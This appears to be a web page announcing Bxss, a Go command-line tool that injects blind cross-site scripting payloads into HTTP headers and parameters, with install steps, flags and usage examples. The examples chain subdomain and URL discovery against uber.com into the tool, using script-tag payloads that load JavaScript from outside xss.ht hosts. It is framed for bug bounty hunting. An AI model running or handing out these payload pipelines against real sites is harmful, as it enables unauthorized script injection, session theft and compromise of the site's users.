Bxss - A Blind XSS Injector tool

(1,265 views)

Features Inject Blind XSS payloads into custom headers Inject Blind XSS payloads into parameters Uses Different Request Methods (PUT, POST, GET, OPTIONS) all at once Tool Chaining Really fast Easy to setup https://github.com/ethicalhackingplayground/bxss Install $ go get -u github.com/ethicalhackingplayground/bxss Arguments ____ | _ \ | |_) |_ _____ ___ | _ <\ \/ / __/ __| | |_) |> <\__ \__ \ |____//_/\_\___/___/ -- Coded by @z0idsec -- -appendMode Append the payload to the parameter -concurrency int Set the concurrency (default 30) -header string Set the custom header (default "User-Agent") -parameters Test the parameters for blind xss -payload string the blind XSS payload Blind XSS In Parameters $ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters Blind XSS In X-Forwarded-For Header $ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For" If you get a bounty please support by buying me a....

October 13, 2020
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023
What certifications or qualifications do you hold?
Max. file size: 150 MB.
What level of experience should the ideal candidate have?
What certifications or qualifications are preferred?

Download Free eBook

Step 1 of 4

Name(Required)

We’re committed to your privacy. Hakin9 uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.